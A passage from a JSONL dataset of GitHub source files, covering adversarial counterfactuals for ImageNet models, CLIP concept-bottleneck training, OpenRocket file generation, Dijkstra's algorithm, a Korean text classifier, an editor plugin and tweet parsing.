path = result_path + f\"/adv_samples_{norm}_eps_{eps}_target_{target_cls}\"\n torch.save(adv_samples.detach(), path)\n else:\n cfs = adv_samples.detach()\n\n if result_path is None:\n if return_losses:\n return cfs, losses\n return cfs\n\ndef compute_diff_image(a, b, filepath=None):\n diff = (a - b).sum(2)\n min_diff_pixels = diff.min()\n max_diff_pixels = diff.max()\n min_diff_pixels = -max(abs(min_diff_pixels), max_diff_pixels)\n max_diff_pixels = -min_diff_pixels\n diff_scaled = (diff - min_diff_pixels) / (max_diff_pixels - min_diff_pixels)\n cm = plt.get_cmap('seismic')\n colored_image = cm(diff_scaled.numpy())\n pil_img = Image.fromarray(np.uint8(colored_image * 255.))\n if filepath is not None:\n pil_img.save(filepath)\n return pil_img\n\ndef compute_diff_act(a, b, filepath=None):\n diff = a - b\n min_diff_pixels = diff.min()\n max_diff_pixels = diff.max()\n min_diff_pixels = -max(abs(min_diff_pixels), max_diff_pixels)\n    max_diff_pixels = 
-min_diff_pixels\n diff_scaled = (diff - min_diff_pixels) / (max_diff_pixels - min_diff_pixels)\n cm = plt.get_cmap('seismic')\n if type(diff_scaled) != np.ndarray:\n diff_scaled = diff_scaled.numpy()\n colored_image = cm(diff_scaled)\n return colored_image\n\n\ndef imagenet_confidence_all(model, device, fpath='results/pipeline/all_conf', batch_size=128, n_workers=8):\n for target_class in range(1000):\n confidences = []\n with torch.no_grad():\n train_loader, _ = data.imagenet_subset(target_class, batch_size=batch_size, n_workers=n_workers)\n\n for batch_idx, (img, lab) in enumerate(train_loader):\n out = model(img.to(device))\n prob = torch.softmax(out, dim=1).cpu().detach().numpy()\n\n confidences.append(prob)\n \n confidences = np.concatenate(confidences, axis=0)\n np.save(f'{fpath}/conf_class_{target_class}.npy', confidences)\n\n\ndef select_start_class(target_class, k=1, fpath='results/pipeline/all_conf', verbose=False, only_geo=False):\n target_conf_means = []\n candidates = [970, 972, 973, 974, 975, 976, 977, 978, 979, 980] if only_geo else range(1000)\n for in_class in candidates:\n confidences = np.load(f'{fpath}/conf_class_{in_class}.npy')\n target_conf_means.append(np.mean(confidences[:, target_class]))\n\n target_conf_means = np.array(target_conf_means)\n sorted_idcs = np.flip(np.argsort(target_conf_means).copy())\n \n if only_geo:\n similar_idcs = np.array(candidates)[sorted_idcs[:k]]\n else:\n if target_class in sorted_idcs[:k]:\n target_flag = False\n for i in range(k):\n if sorted_idcs[i] == target_class:\n target_flag = True\n if target_flag:\n sorted_idcs[i] = sorted_idcs[i+1]\n similar_idcs = sorted_idcs[:k]\n if verbose:\n for i, idx in enumerate(similar_idcs):\n print(idx, data.imagenet_label2class[idx], target_conf_means[i])\n return similar_idcs, target_conf_means[sorted_idcs[:k]]\n\n\ndef create_results_dir(results_path):\n if not os.path.exists(results_path):\n os.makedirs(results_path)\n return results_path\n","repo_name":"YanNeu/spurious_imagenet","sub_path":"neural_pca/counterfactual.py","file_name":"counterfactual.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"47"} +{"seq_id":"22270769393","text":"import pygame\nfrom py.var import constante\n\ndef initialize():\n \"\"\"\n initialize pygame\n \"\"\"\n screen = pygame.display.set_mode((constante[\"width\"],constante[\"height\"]), pygame.FULLSCREEN) \n pygame.display.set_caption(constante['name_of_game'])\n #icon_32x32 = pygame.image.load(\"icon.ico\").convert_alpha() \n #pygame.display.set_icon(icon_32x32) \n clock = pygame.time.Clock() \n ms = clock.tick(constante[\"fps\"]) \n return screen,clock","repo_name":"victordalet/python-fight-game","sub_path":"py/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35117719893","text":"import sys\n\n\nN = int(sys.stdin.readline())\ngrades = []\nfor _ in range(N):\n grade = list(sys.stdin.readline().split())\n grade[1] = int(grade[1])\n grade[2] = int(grade[2])\n grade[3] = int(grade[3])\n grades.append(grade)\n\ngrades.sort(key=lambda x: (-x[1], x[2], -x[3], x[0]))\n\nfor idx, value in enumerate(grades):\n sys.stdout.write(value[0] + 
\"\\n\")\n","repo_name":"Gyusik-Choi/algorithm","sub_path":"baekjoon/10825_국영수/B_10825.py","file_name":"B_10825.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11445897288","text":"import argparse\nimport os\nimport pickle\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nfrom sklearn.metrics import accuracy_score, roc_auc_score\nfrom data import get_dataset\nfrom concepts import ConceptBank\nfrom models import PosthocLinearCBM, get_model\nfrom training_tools import load_or_compute_projections\nimport clip\nfrom torchvision import datasets, transforms\nfrom sklearn.linear_model import SGDClassifier\nimport torch.nn as nn\n\n# Define the configuration for the model\ndef config():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--concept-bank\", required=True, type=str, help=\"Path to the concept bank\")\n parser.add_argument(\"--out-dir\", required=True, type=str, help=\"Output folder for model/run info.\")\n parser.add_argument(\"--dataset\", default=\"cub\", type=str)\n parser.add_argument(\"--backbone-name\", default=\"resnet18_cub\", type=str)\n parser.add_argument(\"--device\", default=\"cuda\", type=str)\n parser.add_argument(\"--seed\", default=42, type=int, help=\"Random seed\")\n parser.add_argument(\"--batch-size\", default=128, type=int)\n parser.add_argument(\"--num-workers\", default=1, type=int)\n parser.add_argument(\"--alpha\", default=0.99, type=float, help=\"Sparsity coefficient for elastic net.\")\n parser.add_argument(\"--lam\", default=1e-5, type=float, help=\"Regularization strength.\")\n parser.add_argument(\"--lr\", default=1e-5, type=float)\n parser.add_argument(\"--num-epochs\", default=30, type=int)\n parser.add_argument(\"--momentum\", default=0.9, type=float)\n parser.add_argument(\"--weight-decay\", default=1e-4, type=float)\n return parser.parse_args()\n\nclass ModelWrapper(nn.Module):\n def __init__(self, pcbm, clip_model, resolution):\n super(ModelWrapper, self).__init__()\n self.pcbm = pcbm\n self.clip_model = clip_model\n \n # Define the preprocessing pipeline within the ModelWrapper\n self.preprocess = transforms.Compose([\n transforms.Resize(resolution, interpolation=transforms.InterpolationMode.BICUBIC),\n transforms.CenterCrop(resolution),\n transforms.Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711))\n ])\n\n def forward(self, images):\n features = self.clip_model.encode_image(images)\n out = self.pcbm(features.float().to(args.device), return_dist = False)\n return out\n\n\n# Function to evaluate the model\ndef evaluate(pcbm, clip_model, test_loader, criterion, preprocess, device):\n pcbm.eval()\n clip_model.eval()\n total_loss = 0\n all_predictions = []\n all_labels = []\n\n with torch.no_grad():\n for inputs, labels in test_loader:\n #inputs = preprocess(inputs).to(device)\n inputs, labels = inputs.to(device), labels.to(device)\n \n # Forward pass through PCBM\n features = clip_model.encode_image(inputs)\n features = features.float().to(device)\n #print(\"Features dtype:\", features.float().to(device).dtype)\n #print(\"Features dtype in evaluate:\", features.dtype) # Debugging print\n\n # Check the data type of pcbm parameters\n #for name, param in pcbm.named_parameters():\n #print(f\"{name} dtype: {param.dtype}\") # Debugging print\n\n outputs = pcbm(features)\n\n # Compute loss\n loss = criterion(outputs, labels)\n total_loss += loss.item()\n\n # Store predictions and 
labels\n predictions = outputs.argmax(dim=1)\n all_predictions.extend(predictions.cpu().numpy())\n all_labels.extend(labels.cpu().numpy()) \n\n avg_loss = total_loss / len(test_loader)\n accuracy = accuracy_score(all_labels, all_predictions)\n return avg_loss, accuracy\n\n# Main function\ndef main(args):\n # Define the save directory\n save_dir = \"/data/gpfs/projects/punim2103/joint_training\"\n # Ensure the save directory exists\n os.makedirs(save_dir, exist_ok=True)\n\n #_, preprocess = get_model(args, backbone_name=args.backbone_name)\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n # Load CLIP model\n clip_model, preprocess = clip.load('RN50', device)\n clip_model = clip_model.to(args.device)\n clip_model.visual.train()\n #for param in clip_model.parameters():\n #param.requires_grad = False\n \n \n # Load dataset\n #preprocess = transforms.ToTensor()\n train_loader, test_loader, idx_to_class, classes = get_dataset(args, preprocess)\n\n # Load concept bank\n concept_bank = pickle.load(open(args.concept_bank, 'rb'))\n concept_bank = ConceptBank(concept_bank, args.device)\n\n # Load PCBM \n pcbm = torch.load('/data/gpfs/projects/punim2103/train_results/pcbm_cifar10__clip:RN50__broden_clip:RN50_0__lam:0.0002__alpha:0.99__seed:42.ckpt', map_location=device)\n\n criterion = torch.nn.CrossEntropyLoss()\n val_loss, val_accuracy = evaluate(pcbm, clip_model, test_loader, criterion, preprocess, args.device)\n\n # Print epoch results\n print(f\"Evaluation before training: Validation Loss: {val_loss:.4f}, Validation Accuracy: {val_accuracy:.4f}\")\n\n #optimizer = torch.optim.Adam(wrapped_model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n optimizer = torch.optim.SGD(pcbm.trainable_params(),\n lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n \n for epoch in range(args.num_epochs):\n print(f'Epoch {epoch+1}/{args.num_epochs}')\n\n \n\n # Step 4: Training loop for CLIP model\n for inputs, labels in train_loader:\n # inputs = preprocess(inputs).to(device)\n inputs, labels = inputs.to(device), labels.to(device)\n\n optimizer.zero_grad()\n\n # Forward pass through PCBM\n features = clip_model.encode_image(inputs)\n features = features.float().to(device)\n out = pcbm(features)\n\n # Backpropagation\n \n loss = criterion(out, labels)\n loss.backward() \n optimizer.step()\n\n print(\"Evaluating...\")\n val_loss, val_accuracy = evaluate(pcbm, clip_model, test_loader, criterion, preprocess, args.device)\n\n # Print epoch results\n print(f\"Epoch {epoch+1}/{args.num_epochs}, Validation Loss: {val_loss:.4f}, Validation Accuracy: {val_accuracy:.4f}\")\n\n # Save the final model\n final_model_path = os.path.join(save_dir, 'final_model.pth')\n torch.save({\n 'clip_model_state_dict': clip_model.state_dict(),\n 'pcbm_model_state_dict': pcbm.state_dict(),\n }, final_model_path)\n\n print(f\"Model saved to {final_model_path}\")\n\n\nif __name__ == \"__main__\":\n args = config()\n main(args)","repo_name":"MariaBulychev/Thesis_5","sub_path":"dustbin/train_pcbm_joint_5.py","file_name":"train_pcbm_joint_5.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42558566471","text":"from __future__ import print_function\nfrom openmdao.api import Component, FileRef\nfrom pprint import pprint\nfrom os import listdir, path\nfrom xml.etree import ElementTree as ET\nfrom random import uniform\n\nclass GenORK(Component):\n \"\"\" Creates ORK file from OpenMETA config 
inputs.\"\"\"\n\n def __init__(self):\n super(GenORK, self).__init__()\n\n #Python wrapper inputs\n self.add_param('payload_mass', val=0.0)\n self.add_param('coneshape', val=0.0, description='nosecone shape', pass_by_obj=True)\n self.add_param('noselen_coeff', val=0.0)\n self.add_param('bodylen_coeff', val=0.0)\n self.add_param('fintype', val=0.0, description='planform fin shape', pass_by_obj=True)\n self.add_param('fincount', val=0.0, description='number of fins', pass_by_obj=True)\n self.add_param('finprofile', val=0.0, description='fin profile', pass_by_obj=True)\n self.add_param('motorclass', val=0.0, description='class of motor', pass_by_obj=True)\n self.add_param('material', val=0.0, description='material used', pass_by_obj=True)\n self.add_param('density', val=0.0, description='density of material [kg/m^3]', pass_by_obj=True)\n self.add_param('finish', val=0.0, description='finish used', pass_by_obj=True)\n self.add_param('launchrodlength', val=0.0)\n\n # Output: ORK File\n self.add_output('ORK_File', FileRef('test.ork'), binary=True, pass_by_obj=True)\n\n\n def pull_template(self):\n \"\"\" Locates template.ork and loads it into memory for use.\"\"\"\n base_dir = path.dirname(path.realpath(__file__))\n temp_path = path.join(base_dir, 'template.ork')\n tree = ET.parse(temp_path)\n return tree\n\n\n def write_ork(self, tempXML):\n \"\"\"Saves the .ork file.\"\"\"\n temp_path = \"test.ork\"\n tempXML.write(temp_path, \"utf-8\", True)\n\n\n def edit_simulation(self, tempXML, launchrodlength):\n \"\"\" edits xml values for simulation(s).\"\"\"\n simroot = tempXML.find('./simulations/simulation/conditions')\n launchrodElem = simroot.find('launchrodlength')\n launchrodElem.text = str(launchrodlength)\n\n\n def edit_motordata(self, tempXML, motorclass):\n \"\"\" Remove all unused motor classes, save the maximum used motor dimensions as variables.\"\"\"\n rocketElem = tempXML.find('.//rocket')\n simElem = tempXML.find('.//simulations')\n motormountRoot = tempXML.find('.//innertube/motormount')\n motorlist = rocketElem.findall('motorconfiguration')\n simlist = simElem.findall('simulation')\n motormountlist = motormountRoot.findall('motor')\n motorsizeList = list()\n\n # remove elements using unselected motorclasses\n for motor in motorlist:\n motorconfigid = motor.attrib['configid']\n motorname = (motor.find('name')).text\n if motorclass not in motorname:\n rocketElem.remove(motor)\n for motor in motormountlist:\n if motor.attrib['configid'] == motorconfigid:\n motormountRoot.remove(motor)\n for sim in simlist:\n simconfigidElem = sim.find('conditions/configid')\n if simconfigidElem.text == motorconfigid:\n simElem.remove(sim)\n else:\n for motor in motormountlist:\n if motor.attrib['configid'] == motorconfigid:\n motorsizeList.append([float((motor.find('length')).text), float((motor.find('diameter')).text)])\n\n # store maximum motor dimensions\n for elem in motorsizeList:\n if elem == motorsizeList[0]:\n elem1 = elem\n elif elem == motorsizeList[1]:\n elem2 = elem\n len_comparison = max(elem1[0], elem2[0])\n diam_comparison = max(elem1[1], elem2[1])\n else:\n len_comparison = max(len_comparison, elem[0])\n diam_comparison = max(diam_comparison, elem[1])\n max_motordimensions = [len_comparison, diam_comparison]\n return max_motordimensions\n\n\n def edit_bodytubes(self, tempXML, motor_dimensions, material, density, finish, bodylen_coeff, payload_mass, coneshape):\n \"\"\" Edits all bodytube dimensions, material, and finish.\"\"\"\n        bodytubeList = 
tempXML.findall(\".//bodytube\")\n for bodytube in bodytubeList:\n bodyroot = bodytube\n (bodyroot.find('finish')).text = finish\n (bodyroot.find('material')).text = material\n (bodyroot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n tubetype = (bodytube.find('name')).text\n if tubetype == 'Payload tube':\n self.edit_payloadtube(bodytube, motor_dimensions, bodylen_coeff, payload_mass)\n elif tubetype == 'Recovery tube':\n self.edit_recoverytube(bodytube, motor_dimensions, bodylen_coeff)\n elif tubetype == 'Engine tube':\n self.edit_enginetube(tempXML, bodytube, motor_dimensions, bodylen_coeff, coneshape, material, density, finish)\n\n def edit_payloadtube(self, bodyroot, motor_dimensions, bodylen_coeff, payload_mass):\n payloadtubelen_scale = 2\n payloadtubelen_offset = 1.5\n tube_radius = (motor_dimensions[1]/2.0 + 0.005)/0.9\n tube_thickness = 0.10*tube_radius\n payloadtubelen_ratio = bodylen_coeff*payloadtubelen_scale + payloadtubelen_offset\n calc_len = payloadtubelen_ratio*float(motor_dimensions[0])\n (bodyroot.find('length')).text = str(calc_len/3.0)\n bodyroot.find('subcomponents/masscomponent/mass').text = str(payload_mass)\n \"==========Edit internal Components==========\"\n bulkheadRoot = bodyroot.find(\"subcomponents/tubecoupler/subcomponents/bulkhead\")\n (bulkheadRoot.find(\"position\")).text = str(-0.015)\n (bulkheadRoot.find(\"length\")).text = str(0.015)\n (bulkheadRoot.find(\"outerradius\")).text = str(tube_radius - tube_thickness)\n\n\n def edit_recoverytube(self, bodyroot, motor_dimensions, bodylen_coeff):\n recoverytubelen_scale = 1\n recoverytubelen_offset = 0.75\n recoverytubelen_ratio = bodylen_coeff*recoverytubelen_scale + recoverytubelen_offset\n calc_len = recoverytubelen_ratio*float(motor_dimensions[0])\n (bodyroot.find('length')).text = str(calc_len)\n\n \"==========Edit internal Components==========\"\n chuteList = bodyroot.findall(\"subcomponents/parachute\")\n shockcordList = bodyroot.findall(\"subcomponents/shockcord\")\n for chute in chuteList:\n if (chute.find(\"name\")).text == \"Drogue chute\":\n (chute.find(\"packedlength\")).text = str(0.20)\n (chute.find(\"packedradius\")).text = str(0.025)\n (chute.find(\"diameter\")).text = str(1.484)\n\n elif (chute.find(\"name\")).text == \"Main chute\":\n (chute.find(\"packedlength\")).text = str(0.21)\n (chute.find(\"packedradius\")).text = str(0.03)\n (chute.find(\"diameter\")).text = str(1.985)\n\n for shockcord in shockcordList:\n if (shockcord.find(\"name\")).text == \"Ripchord drogue chute\":\n (shockcord.find(\"position\")).text = str(-0.01)\n (shockcord.find(\"packedlength\")).text = str(0.01)\n (shockcord.find(\"packedradius\")).text = str(0.0275)\n (shockcord.find(\"cordlength\")).text = str(0.6)\n\n elif (shockcord.find(\"name\")).text == \"Ripchord main chute\":\n (shockcord.find(\"position\")).text = str(0.0)\n (shockcord.find(\"packedlength\")).text = str(0.02)\n (shockcord.find(\"packedradius\")).text = str(0.0275)\n (shockcord.find(\"cordlength\")).text = str(1.5)\n\n def edit_enginetube(self, tempXML, bodyroot, motor_dimensions, bodylen_coeff, coneshape, material, density, finish):\n \"\"\" Edit continuous values for the engine tube and subcomponents with respect to motor values.\"\"\"\n (bodyroot.find('length')).text = str(1.5*motor_dimensions[0] - 1.095*(motor_dimensions[1]/2.0))\n tube_radius = (motor_dimensions[1]/2.0 + 0.005)/0.9\n tube_thickness = 0.10*tube_radius\n (bodyroot.find('radius')).text = str(tube_radius)\n        (bodyroot.find('thickness')).text = 
str(tube_thickness)\n\n \"==========Edit internal Components==========\"\n #Transition\n transroot = tempXML.find('.//transition')\n (transroot.find('shape')).text = coneshape\n (transroot.find('finish')).text = finish\n (transroot.find('material')).text = material\n (transroot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (transroot.find('length')).text = str((tube_radius - tube_thickness)/0.5774)\n (transroot.find('thickness')).text = str(tube_thickness)\n (transroot.find('aftradius')).text = str(motor_dimensions[1]/2.0 + 0.0005)\n #Motorsleeve\n innertubeRoot = tempXML.find('.//innertube')\n (innertubeRoot.find('length')).text = str(motor_dimensions[0])\n (innertubeRoot.find('outerradius')).text = str(motor_dimensions[1]/2.0 + 0.0005)\n (innertubeRoot.find('thickness')).text = str(0.0005)\n\n #engine block\n engineblockRoot = tempXML.find('.//engineblock')\n (engineblockRoot.find('material')).text = material\n (engineblockRoot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (engineblockRoot.find('length')).text = str(3*tube_thickness)\n (engineblockRoot.find('outerradius')).text = str(tube_radius - tube_thickness)\n (engineblockRoot.find('position')).text = str(-3*tube_thickness)\n (engineblockRoot.find('thickness')).text = str(6*tube_thickness)\n\n # centering rings\n centeringringlist = tempXML.findall('.//centeringring')\n for centeringringElem in centeringringlist:\n (centeringringElem.find('material')).text = material\n (centeringringElem.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (centeringringElem.find('length')).text = str(2*tube_thickness)\n (centeringringElem.find('outerradius')).text = str(tube_radius - tube_thickness)\n (centeringringElem.find('innerradius')).text = str(motor_dimensions[1]/2.0 + 0.0005)\n if (centeringringElem.find('name')).text == \"Forward centering ring\":\n (centeringringElem.find('position')).text = str(motor_dimensions[0]/3)\n elif (centeringringElem.find('name')).text == \"Aft centering ring\":\n (centeringringElem.find('position')).text = str(-motor_dimensions[0]/3)\n\n def edit_finset(self, tempXML, material, density, finish, fintype, fincount, finprofile, motor_dimensions):\n \"\"\" Removes excess finset, edits values for fins.\"\"\"\n bodytubeList = tempXML.findall(\".//bodytube\")\n tube_radius = (motor_dimensions[1]/2.0 + 0.005)/0.9\n tube_thickness = 0.10*tube_radius\n for bodyroot in bodytubeList:\n tubetype = (bodyroot.find('name')).text\n bodysubroot = bodyroot.find(\".//subcomponents\")\n if tubetype == 'Engine tube':\n if fintype == 'trapezoidfinset':\n bodysubroot.remove(bodysubroot.find('ellipticalfinset'))\n finsetRoot = bodysubroot.find('trapezoidfinset')\n (finsetRoot.find('material')).text = material\n (finsetRoot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (finsetRoot.find('finish')).text = finish\n (finsetRoot.find('fincount')).text = str(int(fincount))\n (finsetRoot.find('thickness')).text =str(0.005) #half cm\n (finsetRoot.find('crosssection')).text = finprofile\n (finsetRoot.find('rootchord')).text = str(motor_dimensions[0]/1.25)\n (finsetRoot.find('tipchord')).text = str(3*motor_dimensions[0]/8.0)\n (finsetRoot.find('height')).text = str(2*tube_radius)\n\n if fintype == 'ellipticalfinset':\n bodysubroot.remove(bodysubroot.find('trapezoidfinset'))\n finsetRoot = bodysubroot.find('ellipticalfinset')\n (finsetRoot.find('material')).text = material\n 
(finsetRoot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (finsetRoot.find('finish')).text = finish\n (finsetRoot.find('fincount')).text = str(int(fincount))\n (finsetRoot.find('thickness')).text = str(0.005) #half cm\n (finsetRoot.find('crosssection')).text = finprofile\n (finsetRoot.find('rootchord')).text = str(motor_dimensions[0]/2.0)\n (finsetRoot.find('height')).text = str(2*tube_radius)\n\n def edit_launchlug(self, tempXML, material, density, finish, fincount, motor_dimensions):\n \"\"\" Edits xml for the launchlug size.\"\"\"\n lugroot = tempXML.find('.//bodytube/subcomponents/launchlug')\n (lugroot.find('material')).text = material\n (lugroot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (lugroot.find('finish')).text = finish\n (lugroot.find('length')).text = str(motor_dimensions[0]/10.0)\n if fincount == 3.0:\n (lugroot.find('radialdirection')).text = str(60.0)\n elif fincount == 4.0:\n (lugroot.find('radialdirection')).text = str(45.0)\n\n def edit_nosecone(self, tempXML, coneshape, material, density, finish, motor_dimensions, noselen_coeff):\n \"\"\" Edits xml for the nosecone and its subcomponents.\"\"\"\n noseroot = tempXML.find('.//nosecone')\n (noseroot.find('shape')).text = coneshape #change coneshape\n (noseroot.find('material')).text = material #change material name and density attrib\n (noseroot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (noseroot.find('finish')).text = finish # change finish\n noselen_scale = 2.0 #calculated relationship\n noselen_offset = 3.0 #calculated relationship\n noselen_ratio = noselen_coeff*noselen_scale + noselen_offset\n (noseroot.find('length')).text = str(noselen_ratio*float(motor_dimensions[1] + 0.01))\n\n\n def solve_nonlinear(self, params, unknowns, resids):\n \"\"\" This is the 'main' function.\"\"\"\n # set variables\n payload_mass = params['payload_mass']\n coneshape = params['coneshape']\n noselen_coeff = params['noselen_coeff']\n bodylen_coeff = params['bodylen_coeff']\n fintype = params['fintype']\n fincount = params['fincount']\n finprofile = params['finprofile']\n motorclass = params['motorclass']\n material = params['material']\n density = params['density']\n finish = params['finish']\n launchrodlength = params['launchrodlength']\n # create the template rocket file\n tempXML = self.pull_template()\n # remove all unused motors and save max motor dimensions\n motor_dimensions = self.edit_motordata(tempXML, motorclass)\n # edit bodytubes\n self.edit_bodytubes(tempXML, motor_dimensions, material, density, finish, bodylen_coeff, payload_mass, coneshape)\n # edit nosecone\n self.edit_nosecone(tempXML, coneshape, material, density, finish, motor_dimensions, noselen_coeff)\n #edit finsets\n self.edit_finset(tempXML, material, density, finish, fintype, fincount, finprofile, motor_dimensions)\n #edit launchlug\n self.edit_launchlug(tempXML, material, density, finish, fincount, motor_dimensions)\n #write file\n self.write_ork(tempXML)\n","repo_name":"metamorph-inc/openmeta-rocket","sub_path":"scripts/GenORK.py","file_name":"GenORK.py","file_ext":"py","file_size_in_byte":15948,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"}
+{"seq_id":"37832279451","text":"import sys\n\nN = 8\ns = 0\ng = [None for i in range(N)]\ng[0] = [(1, 1), (3, 2)]\ng[1] = [(0, 1), (2, 4), (3, 3), (4, 1), (5, 6)]\ng[2] = [(1, 4), (5, 1), (6, 1), (7, 2)]\ng[3] = [(0, 2), (1, 3), (4, 5)]\ng[4] = [(1, 1), (3, 5), (6, 
2)]\ng[5] = [(1, 6), (2, 1), (7, 9)]\ng[6] = [(2, 1), (4, 2), (7, 1)]\ng[7] = [(2, 2), (5, 9), (6, 1)]\n\nvisited = [False for i in range(N)]\nD = [sys.maxsize for i in range(N)]\nD[s] = 0\nprevious = [None for i in range(N)]\nprevious[s] = s\n\n# The code structure is almost the same as Prim's algorithm.\n# The difference is the part that updates the minimum distance values:\n# it works by accumulating values and comparing the total distances.\n# Also, in Prim's algorithm visited=True means the vertex has been\n# absorbed into the single tree structure, so the total weight of the\n# tree's edges is what is considered; a vertex with visited=True is a\n# fixed value that needs no further minimum-cost computation.\n# In Dijkstra, by contrast, the minimum distance value of a vertex\n# can still change regardless of visited=True.\nfor k in range(N):\n m = -1\n min_value = sys.maxsize\n for j in range(N):\n if not visited[j] and D[j] < min_value:\n min_value = D[j]\n m = j\n\n visited[m] = True\n\n for w, wt in g[m]:\n\n # Why is there no `if not visited[w]` check?\n # Because the goal of this algorithm is the shortest distance to\n # each vertex, a vertex can be used regardless of whether it has\n # already been visited / added to the tree. So even if the minimum\n # distance D[w] is already set and visited=True, it can still be\n # updated with a new weight.\n if D[m] + wt < D[w]:\n D[w] = D[m] + wt\n previous[w] = m\n\nprint(f'Shortest distances from vertex {s}: ')\nfor i in range(N):\n if D[i] == sys.maxsize:\n print(f'No path between {s} and {i}')\n else:\n print(f'({s}, {i}) = {D[i]} ')\n\nprint(f'Shortest paths from vertex {s}: ')\nfor i in range(N):\n back = i\n print(back, end='')\n while back != s:\n print(f' <- {previous[back]}', end='')\n back = previous[back]\n print()\n\nif __name__ == '__main__':\n pass\n","repo_name":"kimdohwan/MyStudy","sub_path":"data_structure_with_python/08_graph/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"11780595303","text":"from transformers import pipeline\nimport pandas as pd\n\n# use train.gender_bias.binary.csv / train.bias.ternary.csv / train.hate.csv\npipe = pipeline('text-classification', model='monologg/koelectra-base-v3-discriminator', device=0)\n\ndf = pd.read_csv('data/test.csv')\n\ndf['label'] = df['comments'].map(lambda x: pipe(x)[0]['label'])\n\nprint(df.label.value_counts())\n\n# ex) hate-speech-detection\nLABEL_DIC = {\n 'none':0,\n 'offensive':1,\n 'hate':2,\n}\n\ndf['label'] = df['label'].map(lambda x:LABEL_DIC[x])\n\ndf.to_csv('./submission.csv', index=None)","repo_name":"glory-ju/juhyeon","sub_path":"ko-electra/kaggle.py","file_name":"kaggle.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"17091386903","text":"from gobject import GObject, SIGNAL_RUN_LAST, TYPE_NONE\nfrom gobject import TYPE_PYOBJECT, SIGNAL_NO_RECURSE, SIGNAL_ACTION\nSCRIBES_SIGNAL = SIGNAL_RUN_LAST|SIGNAL_NO_RECURSE|SIGNAL_ACTION\n\nclass Manager(GObject):\n\n\t__gsignals__ = {\n\t\t\"destroy\": (SCRIBES_SIGNAL, TYPE_NONE, ()),\n\t\t\"activate\": (SCRIBES_SIGNAL, TYPE_NONE, (TYPE_PYOBJECT,)),\n\t}\n\n\tdef __init__(self, editor):\n\t\tGObject.__init__(self)\n\t\tself.__init_attributes(editor)\n\t\tfrom SmartSpace import SmartSpace\n\t\tSmartSpace(editor, self)\n\t\tfrom ConfigurationManager import Manager\n\t\tManager(editor, self)\n\n\tdef __init_attributes(self, editor):\n\t\tself.__editor = editor\n\t\treturn\n\n\tdef destroy(self):\n\t\tself.emit(\"destroy\")\n\t\tdel self\n\t\tself = None\n\t\treturn\n","repo_name":"mystilleef/scribes","sub_path":"GenericPlugins/SmartSpace/Manager.py","file_name":"Manager.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"32625911029","text":"from utils import *\n\n# Reading & Writing ND JSON files\ndef read_and_write(path) -> list:\n '''\n param path (str): directory where the input json file is\n return list_of_tweets (iterable): list containing tweets as json objects with relevant data read in from the file(s) within path input\n '''\n\n # List to store fields from the tweets\n list_of_tweets = []\n\n with zipfile.ZipFile(path , 'r') as infile:\n for geoEurope in infile.namelist(): \n # this goes inside the geoEurope folder\n with infile.open(geoEurope) as f: \n # iterate through each line , i.e. each tweet object\n for line in f: \n tweet = json.loads(line)\n \n # row-wise inclusion into a sub-list\n list_of_field = []\n\n # # User ID\n # try:\n # list_of_field.append(tweet.get('user').get('id')) # use id only if this takes up more mem/time\n # except AttributeError:\n # list_of_field.append(\"None\")\n\n # Timestamp (UTC)\n list_of_field.append(tweet.get('timestamp_ms'))\n\n # # Created At (Local Time)\n # list_of_field.append(tweet.get('created_at'))\n\n # Tweet ID\n list_of_field.append(tweet.get('id'))\n\n\n # # Mentions\n # mentions = []\n # try:\n # # If there are multiple mentions, iterate thru them\n # for mention in tweet.get('extended_tweet').get('entities').get('user_mentions'):\n # mentions.append(mention.get('id'))\n # # Add all mentions as a list element to the list of field\n # list_of_field.append(mentions)\n # except AttributeError:\n # try:\n # # If there are multiple mentions, iterate thru them\n # for mention in tweet.get('entities').get('user_mentions'):\n # mentions.append(mention.get('id'))\n # # Add all mentions as a list element to the list of field\n # list_of_field.append(mentions)\n # # If there are no mentions\n # except:\n # list_of_field.append(\"None\")\n\n # # Coordinates\n # try:\n # list_of_field.append(tweet.get('coordinates').get('coordinates'))\n # except AttributeError:\n # list_of_field.append(\"None\")\n\n # Country\n try:\n list_of_field.append(tweet.get('place').get('country'))\n except AttributeError: # something to do with EOL char for each file. Dunno why. 
